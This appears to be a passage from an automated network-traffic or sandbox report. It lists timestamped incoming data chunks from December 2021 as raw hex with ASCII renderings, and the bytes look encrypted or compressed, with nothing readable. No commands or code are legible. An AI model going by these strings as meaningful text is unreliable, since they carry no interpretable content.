                                              2021-12-03 07:24:05 UTC156INData Raw: 6d a1 4f ab f1 2c a5 78 93 5b 89 1e bf b7 99 4e fb 8b af 3e 5f ba 88 ea fe df 75 e4 de 65 dc df 70 30 7b 99 da 96 1e fc 97 62 10 73 9e 68 8d 4d f0 f6 c6 5c cd 64 46 fe 34 e5 01 3a e2 97 a4 be 8c 72 18 d5 95 fd 43 39 6e dd 6a 0a b3 ce 7c 00 73 e6 09 9a 39 18 3e f5 1a c4 51 1f d4 2e dc e7 f2 65 23 88 0f 86 47 8e f6 7b 0f 08 ea d8 9d e7 0a e5 3e 87 0c 75 59 58 6d b2 91 a5 07 e7 69 34 17 f9 ad 27 91 09 c6 34 cc f5 6c e6 5c 7c 5c 17 a5 a4 57 bb 82 c4 d4 8e ee 44 5c d7 9a c9 3b d8 c7 71 de f3 7f f5 58 39 be 17 bc f9 1a 18 7e fc 4c 72 71 ea 3e 80 70 71 e0 9a 71 65 ff 33 bd 3a 2a 28 bf c2 6f 4e bf 35 71 5b fb 2b 44 4d f5 e8 71 43 d3 9f 33 d7 61 d6 3c c3 20 6f 9c 41 98 40 3a 5e f9 0a 9f f2 49 56 18 8d 01 9d 12 3b 28 40 49 49 28 36 ff 1d 36 14 d6 07 e9 4f b7 8c 9a
                                              Data Ascii: mO,x[N>_uep0{bshM\dF4:rC9nj|s9>Q.e#G{>uYXmi4'4l\|\WD\;qX9~Lrq>pqqe3:*(oN5q[+DMqC3a< oA@:^IV;(@II(66O
                                              2021-12-03 07:24:05 UTC157INData Raw: 65 97 0b f0 20 32 e9 80 ba ea 88 ba a3 94 bd 3d ed ab e3 6e 92 c9 38 39 d9 16 24 a1 87 52 a1 a0 75 87 7c 69 6b 02 99 97 bb eb 7e eb f9 c9 3b 1f 7c b4 8f c3 b0 4f 75 6a 36 31 73 a5 b3 3e 9b 12 c4 82 ad 6b fa b3 8c 5a 1e 86 b4 ed 01 85 46 6a a0 90 09 60 73 8c c3 72 b9 9a 62 d1 5e 98 d1 8d 0e 66 49 f3 a7 3d 87 0a 6d c5 51 0c 5c 2e 3b ec 89 87 90 1c f0 a3 19 56 86 69 36 0f 61 18 3e 58 13 5d 55 8a 74 ba 15 46 0a b6 94 fa c1 e1 47 80 56 a3 b6 55 ae e9 53 32 bf be 26 c2 ed fa 59 6a 6e 94 04 9b 74 c2 95 a0 b9 e4 ed 4f 88 68 9b e6 0e de dd 32 4c f4 57 62 b1 ce 3c 2a bb ed 4f 2a 53 e3 4b 56 a4 22 9e ea 9d c3 af f8 2e 1c ba 2d 40 6b ad 31 b6 79 a4 5a da 06 73 1f b8 d5 17 2e 49 4a 13 7d 9f b8 51 53 3f b8 f4 74 a1 2c 26 16 e1 82 51 f3 f9 6c de 72 d8 a0 64 83 19 ed fa
                                              Data Ascii: e 2=n89$Ru|ik~;|Ouj61s>kZFj`srb^fI=mQ\.;Vi6a>X]UtFGVUS2&YjntOh2LWb<*O*SKV".-@k1yZs.IJ}QS?t,&Qlrd
                                              2021-12-03 07:24:05 UTC159INData Raw: 49 bc 6f a6 66 ff e3 d4 6c bb 7d 5a fd 3c db 03 09 fc 8e a4 a2 8f 8e c1 21 7e 0e 56 33 3a d9 6a 13 82 eb 4e 01 59 df 32 a4 06 2e 07 c7 33 ff 50 26 ea 15 fe b2 b9 04 42 ff 2d b9 6d bc f3 70 32 11 e9 d8 b7 d6 08 f4 2f 8a 1d 5d 70 6b 30 f3 cb de 3a e6 6e 27 15 8a f3 04 b0 34 b4 49 c8 e2 76 d7 5b 73 76 38 a8 ac 7c b8 a2 f0 f4 90 f1 49 45 ca 9e ac 62 9e 9b 06 e3 fd 53 c2 55 39 b4 05 e3 d3 0d 12 6a f8 4a 5c 66 ff 38 9f 6e 7b dd 98 6f 66 ed 17 85 08 25 ce 43 26 87 85 99 27 68 51 e4 17 6b 50 ec fc 69 4b c6 d2 0b de 20 9a 60 c1 29 30 87 56 9d 66 51 24 96 71 80 cc 41 7a 03 aa 04 97 2f 38 1e 45 41 4e 26 28 e4 18 29 3b de 0e e7 77 b8 9c d2 a2 c6 b9 b5 95 25 10 c2 e3 2c e5 23 d9 0b 17 df b0 b0 cb 0f 94 45 e8 cb 0a bd 2c b9 59 4d 26 b0 ab 88 16 36 04 51 e9 29 3c a7 1f
                                              Data Ascii: Iofl}Z<!~V3:jNY2.3P&B-mp2/]pk0:n'4Iv[sv8|IEbSU9jJ\f8n{of%C&'hQkPiK `)0VfQ$qAz/8EAN&();w%,#E,YM&6Q)<
                                              2021-12-03 07:24:05 UTC160INData Raw: 14 04 3c 66 45 26 8d ea 87 e9 5e 71 61 35 21 7c 8b 9a 72 cd 54 82 87 c9 34 b0 f4 c2 14 4d 91 c2 8f 37 a4 40 23 91 d8 4d 3e 21 c6 9e 2e ab 9f 00 ec 4b 86 c6 89 01 3f 69 ac e2 1d 91 0e 68 f4 30 1d 0c 57 36 fd c1 e3 91 00 fd bd 23 3b ef 77 32 03 6c 5c 73 4d 3e 6d 41 98 69 e6 58 0d 14 a5 8c ff cd fb 28 eb 6b 9a a6 4f f8 ad 25 26 a8 8e 3c 97 d3 ae 53 62 70 be 66 85 5f f3 ae 90 89 3a 74 ca 45 a3 b6 c3 3e f7 f3 59 04 d9 5b 2d d9 97 36 70 c2 cf 3a 6e 6e ea 46 4f ab 0e b6 e3 9c f5 94 eb 17 2d a3 7d 4d 79 a3 6e c7 50 f6 19 ed 70 19 37 e4 90 3f 6b 0b 2a 5b 3e a0 b9 32 70 0a f6 a8 3c a7 44 36 10 f2 8e 36 ae d0 6e 81 4f c4 b0 6e 80 76 ab ff 12 f4 1b d3 bc b3 f2 2c 2a cd 6c 74 fe 19 c9 e5 c9 b9 7e 48 c1 5c 73 bb 40 50 18 77 cf 87 76 5f bf c3 f7 48 83 42 1a a9 43 90 b7
                                              Data Ascii: <fE&^qa5!|rT4M7@#M>!.K?ih0W6#;w2l\sM>mAiX(kO%&<Sbpf_:tE>Y[-6p:nnFO-}MynPp7?k*[>2p<D66nOnv,*lt~H\s@Pwv_HBC
                                              2021-12-03 07:24:05 UTC161INData Raw: 35 ed 50 cc 3d 05 e1 17 f3 d8 c9 14 0b a8 31 fc 0a c1 af 64 77 10 fc 85 cc a0 4f ec 23 8d 4d 09 1b 01 69 be ca ff 79 8a 12 76 60 8e d0 13 f5 18 89 64 c3 e9 6d d0 42 78 7a 1f 89 a1 7c e2 c7 fe ef 95 fb 5d 75 c1 a8 b0 4d 9f b7 14 d1 c9 46 ee 48 2b bc 08 b6 a0 1e 5b 74 f5 6b 28 3d af 3a 91 6a 28 a7 c4 3b 6b 4d 9b 44 c0 85 dd 1d 30 d5 81 fd 6b 34 45 e4 2f 14 5c ab fe 32 1f 9c c7 70 8b 76 c4 29 a6 63 3f ef 38 e7 62 58 6e ad 5b da 98 12 1b 55 fe 5a cc 48 48 6e 03 0c 04 7c 0b fa 15 12 5b 96 1e ea 75 de fc ec c3 f8 ed ae ec 01 1f da e8 24 eb 70 90 1a 0a c2 d2 a1 dd 08 b0 55 bf e1 06 ae 22 81 64 06 4c a6 8d a1 05 03 3f 6b 94 08 31 ad 03 7d 12 bf a5 a9 7e 8f 20 d2 72 fd 6e c0 2e 83 cb f5 6d 8f 0d f4 24 89 bc 45 00 84 4a 46 b9 7b 76 67 a6 45 fa 05 bd ca a8 f7 88 75
                                              Data Ascii: 5P=1dwO#Miyv`dmBxz|]uMFH+[tk(=:j(;kMD0k4E/\2pv)c?8bXn[UZHHn|[u$pU"dL?k1}~ rn.m$EJF{vgEu
                                              2021-12-03 07:24:05 UTC162INData Raw: e3 db c6 84 86 69 2a f8 8d 42 10 a1 ef 24 13 b4 48 d3 9d b1 95 34 bc 2a 26 04 32 38 a3 87 de f5 b5 cf 7e d1 44 63 e8 77 c4 28 d0 48 ec 56 55 7f bf 4e 2a 72 cf f0 50 29 41 6b 05 d2 37 52 cb 09 72 d6 ff c7 52 2e 14 ba 1f 1c d7 f6 d5 10 ca 14 df 58 43 63 b7 28 d8 e0 5b b8 7d a0 9a 57 21 02 2c 21 cb be 6c 20 7c 35 42 4b be 05 74 8d a5 0c 5f 0d 95 75 fe 66 6e 40 92 49 a5 0c 60 a1 43 bd fa d4 42 0f ab 64 0d e7 38 46 c7 9e b5 01 71 3c 51 b1 5e 9f 3a ad d4 eb fa c8 04 38 40 ba 55 c9 84 b1 5d 0a cb 79 cc 65 91 36 4a 98 3b a3 81 b9 ef 53 55 99 5a 6d 3e 2f 79 02 a3 92 26 73 7e e1 05 1c eb 27 2f aa 62 fd 86 18 aa 00 55 a5 b4 c8 4f d3 b6 e6 71 bc 0e eb fb 6f 16 e4 df 50 9d 0e 8e 99 f6 1c 7b cf 6b 66 7f 2a 22 dc 6b 1a 08 20 bf 3e 44 a5 ca 74 aa 20 b7 5c ba 5c 1f fd 56
                                              Data Ascii: i*B$H4*&28~Dcw(HVUN*rP)Ak7RrR.XCc([}W!,!l |5BKt_ufn@I`CBd8Fq<Q^:8@U]ye6J;SUZm>/y&s~'/bUOqoP{kf*"k >Dt \\V
                                              2021-12-03 07:24:05 UTC163INData Raw: 93 3b 97 e4 4b 95 8e 64 c5 e1 27 db 9b 11 b3 64 39 d1 8c fc 6a 16 ed b0 bf 2b 3e 59 74 c0 a5 0d e7 10 ce 5b 3a 33 1c d1 97 a5 f2 bf ac 99 94 ab 04 cf 4c d4 4c fe 00 0b d3 ed 34 01 ad 90 8c b2 84 4c 04 4b af 6b 1d 97 91 97 0c 45 a9 db 60 be 9a e4 47 67 e7 7e db 95 a6 e2 fa 84 1c 75 f8 48 bb 26 f3 78 bd 28 1a 4b 4d c0 7d 28 b3 e5 b5 88 cb 78 64 ff 74 a0 68 33 e4 17 e0 d1 00 bb 4a 16 a6 e3 8b b3 25 10 29 6e f2 98 1a f7 cb 9b dc bc 8d 4e fa 09 99 6c 21 a3 e1 36 46 a2 bf c4 9c b0 d0 b7 e0 cd 10 d6 3c 93 6a 8f 0d 1c 4c 6a 9e c4 0d eb 2b 11 a8 26 41 e4 94 0c de 89 67 70 1b ea ee f1 72 92 1d fc 3d 02 40 3e 70 7f 77 26 f4 de 87 76 63 a2 1b 6e 8c 10 38 d3 c2 4d 6e d6 a6 05 0f 12 b8 1c b9 e5 9b c4 ba cc a7 e0 4c 65 4c c2 41 2a 26 ea 4a e6 e9 c0 ea b0 5d 33 54 ef 8c
                                              Data Ascii: ;Kd'd9j+>Yt[:3LL4LKkE`Gg~uH&x(KM}(xdth3J%)nNl!6F<jLj+&Agpr=@>pw&vcn8MnLeLA*&J]3T
                                              2021-12-03 07:24:05 UTC164INData Raw: 08 13 b3 be 95 49 39 c3 92 18 67 a7 13 bc 31 fb 26 c7 8c 35 a2 84 29 1d 63 8b 0d 97 b3 d8 ba 58 70 55 ce 4d 93 4d 55 d5 20 68 34 4d 7f cc 04 e0 cb 0f df bd 98 9f 68 53 bc f0 b0 c3 8c eb c6 0e a5 d6 76 06 7b fc 34 27 7e 4e ed d5 8d 2c d1 18 b0 d3 de ff 84 68 68 fa be 16 8c 45 be 71 06 80 09 f7 98 27 6e 14 e2 16 7c 70 ed af ae a1 41 4f db 09 c1 08 94 d2 33 1b 48 8d 30 b2 e4 f6 e5 6e e2 56 dd f0 22 83 20 37 f3 2c e9 52 e4 04 7c ce c3 5b d8 10 e1 05 1d ab 9a 65 53 62 ff 86 18 aa 19 51 a5 b8 c9 4d 21 c0 69 5e 8e 21 d8 cb 4a 3c dd df 51 9f f8 8a 22 97 1e 7a cf c7 a6 7b 2a 01 a3 69 e0 04 1f be 3c 10 90 ca 9d 96 73 c3 33 d3 38 79 35 57 81 0f 22 41 97 15 e8 ab 23 28 75 c8 b2 fa 70 62 58 22 d0 3d 48 5e 94 75 73 67 7c 7e 99 12 c7 fe 9c c0 b6 b0 f3 a1 2b 1c 10 e1 31
                                              Data Ascii: I9g1&5)cXpUMMU h4MhSv{4'~N,hhEq'n|pAO3H0nV" 7,R|[eSbQM!i^!J<Q"z{*i<s38y5W"A#(upbX"=H^usg|~+1
                                              2021-12-03 07:24:05 UTC166INData Raw: 96 b9 ce 94 3e 3a d1 8b 77 56 66 da 14 14 05 2e 94 8f 9e 4b 62 bc 5c ae 57 70 92 25 87 85 86 d3 9b fd c9 be a2 9a 41 62 77 0f 6b 8d 27 ad f2 f7 a7 5e 9b e3 58 c8 16 1b 84 b2 38 62 5a 8a 86 46 25 76 cc 5d cc d5 75 7a f5 9c c5 5a 20 97 06 27 14 13 b6 6c 39 61 bf 93 be 50 06 ee f2 fb 8b 68 fa b4 40 fb f7 60 5e 3d 2b 8e 7e 38 bc e1 78 e7 b6 86 e7 9a cd c4 a4 ef 8d 86 8d 2f d3 c8 c4 9b c2 58 2a 4c 8f 9b 5d 38 51 f0 51 d7 e0 81 4c 3e 80 77 24 17 f9 dd 89 85 e7 16 b8 54 58 b7 ce 64 3b d1 09 e4 8a 9f 65 a5 f2 d9 2f 93 58 26 8a 00 89 6e 9e 80 73 f0 90 bf 54 19 a9 dc f3 bb 84 98 aa 0b ae 4b 8a 41 3e 10 b1 4a f5 15 96 ad d8 5a 7e 72 9a 3c 93 40 68 63 2f 9a 68 9f 5d 3b 0b 5f aa 16 c5 1c 4a 92 2a 9e 4f b9 93 e0 61 65 82 b0 26 00 03 b1 98 3e 96 b8 29 80 fb fb 3f 34 a0
                                              Data Ascii: >:wVf.Kb\Wp%Abwk'^X8bZF%v]uzZ 'l9aPh@`^=+~8x/X*L]8QQL>w$TXd;e/X&nsTKA>JZ~r<@hc/h];_J*Oae&>)?4
                                              2021-12-03 07:24:05 UTC167INData Raw: 61 7a d9 2c b6 bc d8 de a8 a9 c9 3f fd 28 e4 9e 95 0c a8 f4 0c 89 80 eb da a5 e9 8f 70 5c d1 ef c0 da 79 51 06 a4 c6 25 a9 9a a0 68 ef 92 40 56 34 aa 64 37 d6 5e 04 05 33 40 42 62 e6 cc 66 c1 f9 33 bc 9d 5a 45 0e c2 75 92 c1 eb 5a c8 ff 2c 81 2b a0 d1 98 e1 65 f1 a6 4d 1f 21 04 c2 7a 87 7f 5a 36 52 99 43 8a 02 3a cd 53 9c 07 73 56 c4 35 7d c4 1a 99 2c 03 25 64 c1 7c ff c6 d2 2d 8d b0 c5 cd 5c 55 dc ed 52 9b 0e 7d 9f a4 1e 7d cf 58 e4 4d 28 07 a2 46 1d 36 a6 b9 3e c1 91 f8 76 8f 73 b1 2f ad 2d 7e 8e 24 82 37 20 47 e5 e3 ee 92 20 2c 63 67 69 c9 70 64 58 50 26 ab 55 58 89 07 6b 54 a2 79 9b e5 c1 cc e9 c2 b6 2f ef 93 0f 1b ce cd 33 db 36 91 19 77 de f8 af d6 10 da 54 dc c6 1f b3 cc 9c 5f 6e 65 8f 61 8f 1a 2c 07 4c 85 2f 2c b5 2f 58 51 b7 ae 8c 74 84 43 cc 7a
                                              Data Ascii: az,?(p\yQ%h@V4d7^3@Bbf3ZEuZ,+eM!zZ6RC:SsV5},%d|-\UR}}XM(F6>vs/-~$7 G ,cgipdXP&UXkTy/36wT_nea,L/,/XQtCz
                                              2021-12-03 07:24:05 UTC168INData Raw: 8d a5 a0 e2 75 a6 4f 66 9c 49 15 1f 17 50 bb 28 60 5b 0a da 7a 08 06 cc b8 a8 d1 78 78 f4 9c 88 ee 33 83 27 55 ca ed b3 62 38 61 f9 8d b3 d2 07 f8 54 86 99 90 f3 ba 86 da bc 62 5f bd 13 84 4e 48 bc e5 3f f9 a0 98 e1 9c b0 42 b7 fb fb 74 fe 25 9a c6 92 1b 35 5e 6a d2 d9 0d e2 4b 10 fe 0e 47 cd 32 52 20 86 71 59 00 ea 28 d9 a2 9d 06 fc d6 51 37 39 62 7f de 0f 12 e2 7f 74 b6 a4 11 3d 92 10 38 dc 91 7e 75 d5 78 27 61 0f 42 7c 07 ff 5c de ad cc 75 ea 0d 7f 5b c2 cb 5a 16 cc 4c e6 06 c0 7c a9 32 3a 7d cc a0 07 46 25 7d 79 0b f7 ae 07 4c 54 ce 87 c1 eb 02 1c 12 fb 8e 02 d5 c4 e6 c6 73 cf d2 1b 80 40 b3 d5 31 c0 4a f4 d0 b5 f4 39 2a b1 75 50 d0 24 e6 cb 85 90 8d 46 ff 6a 2f e1 6b 74 26 61 e0 b0 3b 66 d0 e6 eb 4b da 14 3f 89 78 b7 6f 1a 69 ef a6 dc cf 6f ad cf e1
                                              Data Ascii: uOfIP(`[zxx3'Ub8aTb_NH?Bt%5^jKG2R qY(Q79bt=8~ux'aB|\u[ZL|2:}F%}yLTs@1J9*uP$Fj/kt&a;fK?xoio
                                              2021-12-03 07:24:05 UTC170INData Raw: 6a fa be 16 d7 52 cc 70 67 8f fb f7 af bf 6c 14 e2 16 df 73 9f ae a0 a1 bb 4f 45 92 c4 08 94 d2 ad 0e 58 99 3e b2 22 f6 51 6f e7 56 de f0 cb 98 1c 12 1f 2e 22 52 5d 05 7e cf c0 5b 45 0a a6 0e b2 a6 51 65 e8 63 fd 87 1b aa 46 56 98 b3 d9 40 f6 c0 d2 5f 8c 20 db cb 1a 24 91 d4 eb 92 2b 8a 99 96 1c 7b cc c7 e3 67 16 24 53 69 3f 04 a4 bf 3e 10 93 ca 32 8a 34 c8 80 dc 17 78 8e 56 83 0e 21 41 a3 17 d5 a0 33 25 46 c9 6e fb 72 62 5b 22 61 38 04 55 32 7a 4f 66 a0 7f 9b 12 c4 fe ed dc 8a 95 1f a3 28 1d ce e0 34 e9 37 97 5f 06 98 8d 72 df 35 a8 55 e5 c4 19 b0 3b dc 65 51 68 40 bf ab 28 2e 01 4c f7 2d 1f df 2a 14 28 ca b4 85 72 c3 ab cd 6a 8f 46 fa 57 ad e1 15 45 09 ef a6 fb 62 54 ac ff 00 f8 95 7e 9a 94 b2 50 df 89 f4 4a 33 37 51 7a f7 ed 8c 1b 22 71 1c 66 98 66 55
                                              Data Ascii: jRpglsOEX>"QoV."R]~[EQecFV@_ $+{g$Si?>24xV!A3%Fnrb["a8U2zOf(47_r5U;eQh@(.L-*(rjFWEbT~PJ37Qz"qffU
                                              2021-12-03 07:24:05 UTC171INData Raw: f9 8d a0 52 98 ef c2 f0 b2 6a 67 b2 87 da bc 62 4c 3d a1 97 9e 2b 97 e1 a6 e3 a1 98 e1 9c a3 c2 9e dc 2b 17 d5 2e 17 c4 93 1b 35 5e 79 52 ab 1a 78 31 3b ee d3 43 cc 86 0c 20 95 71 2b 10 76 db f5 05 89 02 fd 4a 0e 37 2a 62 52 c8 4f f8 dd 99 22 b2 a5 59 5d 92 03 38 31 85 8e 79 fc 9e 11 67 0e be 1c 07 ec 5c 41 be 17 84 d6 8b 3f 52 c3 5f 38 16 df 4c cb 10 57 37 80 5b 8b 75 cd bc 64 46 36 7d 67 0e 2c 9c 3a 25 65 c5 86 11 88 02 0f 12 32 9d cf bd ef 60 b7 78 ce ae 70 80 53 b3 5a 11 30 29 df 89 36 f9 38 32 dd 75 43 d0 42 e4 10 f5 bb 60 0f f3 6b 5b 90 6b 67 26 13 f7 c0 41 4d 86 10 e4 4a b2 60 3f 9a 78 a0 7f ea 0a c4 0e ea f8 6e dd ba e1 14 99 03 43 f1 7b e7 c6 6e 30 83 6a b0 a8 d0 c3 32 26 f5 78 d3 db fa 48 79 4a e2 38 f2 4d 2e 17 af 3b f8 bc 5f 87 aa 76 b0 3a 60
                                              Data Ascii: RjgbL=++.5^yRx1;C q+vJ7*bRO"Y]81yg\A?R_8LW7[udF6}g,:%e2`xpSZ0)682uCB`k[kg&AMJ`?xnC{n0j2&xHyJ8M.;_v:`
                                              2021-12-03 07:24:05 UTC172INData Raw: 50 d5 34 c4 c9 21 7a ee c4 44 53 5d 05 7e c9 cb 8a 0a c9 e1 48 1c 5d 37 64 e8 63 fd 81 10 ed 2d 70 a1 f6 c8 67 97 c1 d2 5f 8c 26 d0 92 71 d9 dc 91 50 a9 4a 8b 99 96 1c 7d c7 9a ed 5a 2e 4e a2 03 5e 05 a4 bf 3e 16 98 a3 7c 77 72 8c 2e a7 76 79 8e 56 83 08 2a 7c d1 3a e9 fb 22 82 27 c8 6e fb 72 64 50 68 13 a3 4b 0e 89 c1 2e 67 a0 7f 9b 14 cf 30 fe e1 b2 e1 ee 49 49 1c ce e0 34 ef 3c 4b 0c fb de d7 b0 24 54 a9 55 e5 c4 1f bb 12 84 43 68 31 8f 98 cb 29 2e 01 4c f1 26 5c 87 d7 59 71 b6 8f e5 73 94 31 cd 6c 87 32 e4 61 ee 97 93 2d 69 ee 12 d9 62 52 a4 7c 09 78 aa 08 89 e0 d2 51 ab 13 f4 4c 3b 8f 63 cb 81 b8 6a bc 42 70 24 fd 98 60 5d 0c d4 55 e4 e9 45 2b d9 4b e6 96 1b ba 4e a9 d4 a8 ab c1 07 43 a1 b8 d1 47 c9 e8 a8 a5 e3 90 19 9a c4 3f 09 8d 50 51 59 13 ee 38
                                              Data Ascii: P4!zDS]~H]7dc-pg_&qPJ}Z.N^>|wr.vyV*|:"'nrdPhK.g0II4<K$TUCh1).L&\Yqs1l2a-ibR|xQL;cjBp$`]UE+KNCG?PQY8
                                              2021-12-03 07:24:05 UTC173INData Raw: 62 4f 7b fa 6a c2 61 96 ef 07 57 cd 87 14 1c a3 21 7a 60 ea ef 57 04 95 17 fc 4b 0e 45 38 71 7f be 0f fe 7d 98 76 a7 a4 58 5d 65 16 2b dc f1 7e 58 5d 9f 25 70 0f af 1c 75 fe 2a fd cd cc 02 77 8a 7f 4a c2 49 38 64 cd da c5 66 c0 99 88 5b 33 6c cc ba 7c 7a 00 6e 79 6b f7 f2 9c 24 5d df 87 77 8b 70 1d 92 da ee 02 63 49 61 cf 62 cf a8 68 bc 65 a0 d5 51 c0 c7 79 88 b6 e5 39 54 de 24 40 c3 24 81 cb f9 1c 61 4f ee 6a 1f 93 19 75 d8 60 87 b0 55 ea 87 ec f9 4b a3 78 7d ac fe b7 08 1a 8b 63 0f d6 db 6f cb ba 93 06 b2 0a 35 47 9b 40 c7 1a 15 82 7c b0 da c2 f2 e5 55 e5 e7 77 da 9a 6e 78 5c e2 4a e0 0e 78 64 1a 6c 5d bd 87 a1 ab 60 b0 48 72 99 5d f3 98 e2 d8 d3 3c 1f f3 f7 83 29 fd 68 c4 39 bc 14 bb a4 02 d2 e3 fa 92 c3 5e 68 02 3e 9f 65 f1 2c ef d8 70 9b 00 28 63 c2
                                              Data Ascii: bO{jaW!z`WKE8q}vX]e+~X]%pu*wJI8df[3l|znyk$]wpcIabheQy9T$@$aOju`UKx}co5G@|Uwnx\Jxdl]`Hr]<)h9^h>e,p(c
                                              2021-12-03 07:24:05 UTC175INData Raw: 6e cf 21 27 ad 00 51 9d 0e 8a 8f 96 6e 7a 91 cc 98 7f e6 de a3 6b 1a 04 b2 bf c9 16 64 c1 09 89 63 23 2f d3 32 78 98 56 74 08 7c 4a 98 14 b0 4b 23 2a 63 c9 7f fb 00 63 f3 08 5a 3b 74 bf 88 75 6a 66 b1 7f e9 13 0c d4 96 c4 52 51 ef a1 0d 1d d8 e0 c3 ef 24 9c 64 05 af 6d b1 d0 10 a8 43 e5 5b 18 38 2b e7 66 5c 8f 8e b0 8e 28 38 01 3e f6 50 34 e4 29 e0 d3 b7 bb a0 72 82 31 3a 6c f1 6d 96 4f 5b e6 93 45 2c ef 14 c1 5e 71 bf ff 7b e0 9d a8 88 94 97 50 bd 13 86 4b eb 1c 3f 7a 3d 18 6b 14 07 71 32 fd ea 67 a5 e4 88 e9 f8 4b 44 9f 9c 4a f0 96 ec ba 4c ac b5 e1 c6 63 06 ab e4 b9 d7 5f f5 cb 83 b3 82 50 9d 38 c5 cb 4c 8c 56 49 65 30 b7 2e 9c 8a 3b 66 97 3c 97 fb d3 5a b5 de a2 93 2e 53 41 c9 5d 79 51 7d 86 0b dc c6 81 95 72 6d 06 c4 2d db 27 25 02 5a 17 f4 8c e3 02
                                              Data Ascii: n!'Qnzkdc#/2xVt|JK#*ccZ;tujfRQ$dmC[8+f\(8>P4)r1:lmO[E,^q{PK?z=kq2gKDJLc_P8LVIe0.;f<Z.SA]yQ}rm-'%Z
                                              2021-12-03 07:24:05 UTC176INData Raw: 6d 38 66 82 7c 68 d6 9e b3 70 ef bc fa 05 82 5c 08 be ce 86 fc 8b e9 4a 61 4b de 14 b1 4c 14 15 c2 2d aa 5b a5 6c c6 bf 82 44 58 7d 77 19 f5 9e 10 25 cb df 80 07 6e 00 61 12 d1 9c 00 a7 c5 60 59 62 f1 ad 96 82 3d b3 90 23 c2 38 f5 89 20 e5 33 25 3b 77 2d d0 44 f3 c9 f7 91 60 d9 ee 02 58 76 69 09 26 1d f5 b2 49 67 86 7a f9 0c a5 86 3d f4 78 20 7a 18 1b ee 0e 40 db fd de 5c e3 7a 99 9d 47 45 7f cd c6 8c 15 f3 7d 56 aa be c3 0e 27 e7 73 f9 db 0c 6e a4 49 04 3a 9c 4d b6 15 18 20 d2 bc 11 a1 13 6e 56 38 0e c7 7f 83 9a 1e 57 d2 aa 1f f5 e5 65 59 81 19 c2 49 be 40 2b a5 94 d2 67 e6 74 b3 22 ef 18 4f 9d fd 61 2d 79 d8 40 99 e6 58 1f 58 a7 6c de ff d4 e0 52 73 10 12 ce 73 2d 89 70 97 bb 17 92 38 44 70 e2 16 5e bd e8 49 37 c6 90 18 16 a5 54 bc ae da c2 c5 f1 35 5e
                                              Data Ascii: m8f|hp\JaKL-[lDX}w%na`Yb=#8 3%;w-D`Xvi&Igz=x z@\zGE}V'snI:M nV8WeYI@+gt"Oa-y@XXlRss-p8Dp^I7T5^
                                              2021-12-03 07:24:05 UTC177INData Raw: 30 e8 16 e8 ab 22 bc 63 54 68 1d 70 1f 58 b0 2a 39 48 5e 89 e3 6a ea a1 99 99 6f c7 4a e6 c6 b6 b0 ee 37 0d 0c c9 06 36 94 34 41 14 07 df 86 b0 46 10 16 54 03 c6 64 b3 c3 97 64 6c 63 8f 26 8e 6f 29 e7 4e 8a 2e 06 97 2b 58 23 b6 2d a0 42 96 d7 cf 17 8f 7c e5 4d ef c4 93 d3 2c e6 1a 3f 60 29 ac a3 08 e2 a9 5b 89 02 97 dc a9 f5 f6 37 33 4a 4c 78 85 ec 6a 82 07 87 2d 1b 9a 1b 55 50 fb eb e0 bd 45 09 9c f3 e4 70 19 c1 46 41 c6 e3 aa 94 07 3d e4 ef c5 a1 cb 93 a0 73 f1 52 19 cf c4 5d 4c 6f 52 b7 5b 68 e6 07 ee 88 47 9e 96 aa 97 5d a1 bf e6 b3 b1 b5 5c 51 89 30 5c ef 51 70 83 f5 e2 9e 41 d2 00 6f b2 e6 2d 4d 27 2f 12 a4 29 ac 9f 8b 70 3f ff b0 69 99 2b 33 65 26 16 5a d3 b4 d3 59 bf 00 09 6c 85 a8 fe 71 bb cf 92 00 28 d2 8b ce 4a 68 c7 7e 17 11 30 7c 92 53 44 aa
                                              Data Ascii: 0"cThpX*9H^joJ764AFTddlc&o)N.+X#-B|M,?`)[73JLxj-UPEpFA=sR]LoR[hG]\Q0\QpAo-M'/)p?i+3e&ZYlq(Jh~0|SD
                                              2021-12-03 07:24:05 UTC178INData Raw: 56 f1 e1 24 11 14 87 02 db 73 ed af 25 a1 e9 4e 8f 0a b9 08 13 c6 eb 0c 48 8d bb b2 fb f0 b7 6d 9a 56 74 e4 cf 80 20 37 78 2c ae 53 bb 07 03 cf 08 4f 01 09 e1 05 8a a9 46 62 0e 61 80 87 f5 be 02 55 a5 b8 5e 4f 05 c1 34 5d f1 20 d7 de 5e 27 dd df c6 9d bd 8d 7f 94 61 7b fe d2 e7 7f 2a 01 34 6b 6d 06 42 bd 43 10 c3 df 76 89 73 c3 b8 d3 d3 71 68 54 fe 0e 57 54 e7 14 e8 ab b4 2a c7 cb 88 f9 0f 62 cf 37 25 3b 48 5e 1f 75 49 72 46 7d e6 12 7e eb e9 c4 b6 b0 78 a1 c3 1f 28 e2 49 e9 ef 82 1b 05 df 86 26 d0 7b bc b3 e7 b9 19 4e 2e 98 66 6c 63 19 b0 76 2a c8 03 31 f7 31 09 9b 29 58 23 20 bb 55 67 72 33 b0 6a ce 50 e9 4f ef c4 05 45 0e ec f4 db 1f 54 cf e9 04 e0 a9 5b 1f 94 6f 46 4d 11 89 4a b6 21 40 7a 85 ec fc 14 51 72 c2 ff e5 66 f3 d9 f7 e9 e0 bd d3 9f a9 5d 00
                                              Data Ascii: V$s%NHmVt 7x,SOFbaU^O4] ^'a{*4kmBCvsqhTWT*b7%;H^uIrF}~x(I&{N.flcv*11)X# Ugr3jPOET[oFMJ!@zQrf]
                                              2021-12-03 07:24:05 UTC179INData Raw: 1d b6 fb da 25 42 5d 3d 13 92 f8 3a a1 d0 d0 eb dd 98 5a bc b2 c2 b7 ed 4d 06 30 2b 75 d4 ef 1b e8 7e 68 52 d9 1b 54 39 57 df e1 55 b0 86 f3 00 84 71 59 11 7c df d5 03 73 15 81 4a 2e 16 3b 62 7f cf 99 e2 ec ab 90 a5 d9 59 1f b3 12 38 dc 80 e8 68 e2 98 c3 72 72 be 78 26 fd 5c de bc 5a 86 62 b9 99 48 bf 5f be 37 ce 4c e6 17 56 2d f4 5d d5 6e b1 bc c3 67 27 7d 79 1a 61 9e ee 11 bb dd fa 11 40 23 1e 12 fb 9f 94 a7 e2 61 29 60 b2 ae 9a a1 42 b3 d5 20 56 38 7e 8f 50 e7 44 32 d1 57 52 d0 24 f0 5d f7 eb 61 a9 ec 17 5b be 49 76 26 61 f6 26 49 98 80 0a fb 36 b2 30 1d 8b 78 b7 79 8c 1b 42 0f 30 d9 12 dd c8 c3 05 99 2e 44 d1 7f f8 c1 fc 17 ff 6a 24 8a c1 c3 c1 24 73 73 20 da 7c 6c 05 4a 57 1a e3 4d 5c 16 8c 20 64 